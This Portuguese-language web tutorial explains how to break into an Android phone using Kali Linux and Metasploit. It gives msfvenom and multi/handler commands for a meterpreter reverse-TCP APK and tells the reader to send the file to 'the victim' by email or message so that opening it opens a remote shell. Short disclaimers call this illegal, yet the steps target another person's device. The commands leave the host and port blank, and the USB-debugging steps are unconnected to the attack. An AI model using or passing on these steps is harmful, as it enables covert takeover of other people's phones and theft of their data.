Como invadir um celular Android com Kali Linux: Tutorial Completo

Nos dias de hoje, é comum ouvirmos falar sobre a invasão de celulares. Essa prática, muitas vezes ilegal, pode ser feita por pessoas mal-intencionadas e que desejam obter informações pessoais das vítimas. Por outro lado, também existem especialistas em segurança que precisam testar a segurança de seus próprios dispositivos e, para isso, utilizam ferramentas como o Kali Linux.

O Kali Linux é uma distribuição Linux desenvolvida especialmente para testes de segurança. Ele possui diversas ferramentas que podem ser utilizadas para testar a segurança de redes, servidores e dispositivos, como celulares Android. Neste artigo, vamos ensinar um passo a passo de como invadir um celular Android utilizando o Kali Linux.

Antes de começar, é importante ressaltar que a invasão de um dispositivo sem a autorização do proprietário é uma prática ilegal e pode acarretar em processos judiciais. Portanto, o objetivo deste tutorial é apenas educativo e não deve ser utilizado para fins ilegais.

Passo 1: Preparando o ambiente

Para invadir um celular Android com o Kali Linux, é necessário preparar o ambiente. Primeiramente, é preciso ter uma máquina virtual ou um computador com o Kali Linux instalado. Além disso, é necessário ter um cabo USB para conectar o celular ao computador.

Passo 2: Habilitando a depuração USB

Para que o Kali Linux possa acessar o celular Android, é preciso habilitar a depuração USB no dispositivo. Para isso, vá em Configurações > Opções do desenvolvedor e ative a opção “Depuração USB”. Caso essa opção não esteja visível, é preciso habilitar as opções do desenvolvedor. Para isso, vá em Configurações > Sobre o telefone e toque várias vezes em “Número da versão”.

Passo 3: Conectando o celular ao computador

Com a depuração USB habilitada, é hora de conectar o celular Android ao computador utilizando o cabo USB. Certifique-se de que o celular esteja desbloqueado e que a opção “Transferência de arquivos” esteja selecionada.

Passo 4: Identificando o dispositivo

Com o celular conectado ao computador, abra o terminal do Kali Linux e digite o seguinte comando:

adb devices

Esse comando irá listar todos os dispositivos conectados ao computador. Se o celular Android estiver conectado corretamente, ele deve aparecer na lista.

Passo 5: Instalando o Metasploit Framework

Para invadir o celular Android, é necessário instalar o Metasploit Framework. Para isso, digite o seguinte comando no terminal:

apt-get update && apt-get install metasploit-framework

Esse comando irá instalar o Metasploit Framework no Kali Linux.

Passo 6: Selecionando a carga útil (payload)

Com o Metasploit Framework instalado, é hora de selecionar a carga útil (payload) que será utilizada na invasão do celular Android. A carga útil é um código malicioso que será executado no celular da vítima.

Existem diversas cargas úteis disponíveis no Metasploit Framework, cada uma com uma funcionalidade diferente. Para selecionar a carga útil, digite o seguinte comando no terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o .apk

Substitua pelo endereço IP da sua máquina e por uma porta de sua escolha. O nome do arquivo .apk pode ser qualquer um que você desejar.

Passo 7: Iniciando o Metasploit Framework

Com a carga útil criada, é hora de iniciar o Metasploit Framework. Para isso, digite o seguinte comando no terminal:

msfconsole

Esse comando irá abrir a interface do Metasploit Framework.

Passo 8: Configurando o ataque

Agora é hora de configurar o ataque. Para isso, digite os seguintes comandos no terminal:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST
set LPORT
run

Esses comandos irão configurar o Metasploit Framework para receber a conexão da carga útil que foi instalada no celular Android.

Passo 9: Enviando a carga útil para o celular Android

Com o Metasploit Framework configurado, é hora de enviar a carga útil para o celular Android. Para isso, transfira o arquivo .apk que foi criado no Passo 6 para o celular da vítima. Você pode enviar o arquivo por e-mail, por mensagem ou por qualquer outro meio que achar conveniente.

Passo 10: Executando a carga útil

Com a carga útil instalada no celular Android, é hora de executá-la. Para isso, basta que a vítima abra o arquivo .apk que foi enviado.

Passo 11: Acessando o celular Android

Com a carga útil executada no celular Android, é possível acessá-lo remotamente utilizando o Metasploit Framework. Para isso, basta que a vítima esteja conectada à internet e que a conexão com o Metasploit Framework esteja estabelecida.

Conclusão

Invadir um celular Android com o Kali Linux pode ser uma tarefa complexa, mas é possível com as ferramentas certas. No entanto, é importante ressaltar que essa prática é ilegal e pode acarretar em processos judiciais. Portanto, é importante utilizar essas ferramentas apenas para fins educativos e de teste de segurança.

Deixe um comentário